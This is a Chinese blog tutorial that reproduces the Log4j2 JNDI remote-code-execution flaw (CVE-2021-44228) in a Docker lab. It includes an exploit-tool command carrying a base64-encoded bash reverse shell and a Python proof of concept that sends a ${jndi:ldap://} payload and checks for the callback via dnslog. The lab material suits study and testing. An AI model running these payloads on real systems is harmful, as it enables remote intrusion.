Apache Log4j2远程代码执行漏洞复现 CVE-2021-44228,python编写POC

环境搭建:

使用docker拉取:

[root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09   

运行:

[root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09   

查看端口:


[root@www ]# docker ps                                                        
CONTAINER ID   IMAGE                            COMMAND                  CREATED          STATUS          PORTS                                         NAMES
4143c7d55448   vulfocus/log4j2-rce-2021-12-09   "java -jar /demo/dem…"   20 seconds ago   Up 19 seconds   0.0.0.0:51832->8080/tcp, :::51832->8080/tcp   happy_wescoff
                                                                               

环境启动后,POST方式访问http://your-ip:port即可看到页面。
在这里插入图片描述

漏洞复现:

在这里插入图片描述

反弹shell:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}” -A “192.168.33.11”

在这里插入图片描述
根据自己的java版本,最好每个都多试几次,我用的java 1.8.0_202 。
在这里插入图片描述
在这里插入图片描述

工具地址:
https://github.com/welk1n/JNDI-Injection-Exploit

POC编写:

import requests,random,time

url = "http://192.168.33.172:51832/hello"


def poc():
    try:
        session = requests.session()
        ret = session.get("http://www.dnslog.cn/getdomain.php?t=" + str(random.randint(100000, 999999)),
                          timeout=20).text

        poc="${jndi:ldap://%s/}"   %ret

        data = {"payload": f"{poc}"}

        requests.post(url,data)

        time.sleep(5)

        ret2 = session.get("http://www.dnslog.cn/getrecords.php?t=" + str(random.randint(100000, 999999)),
                          timeout=20).text
        if ret in ret2:
            print(f"{url}    存在Apache Log4j2远程代码执行漏洞 CVE-2021-44228")
    except:
        pass

poc()


运行结果:
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值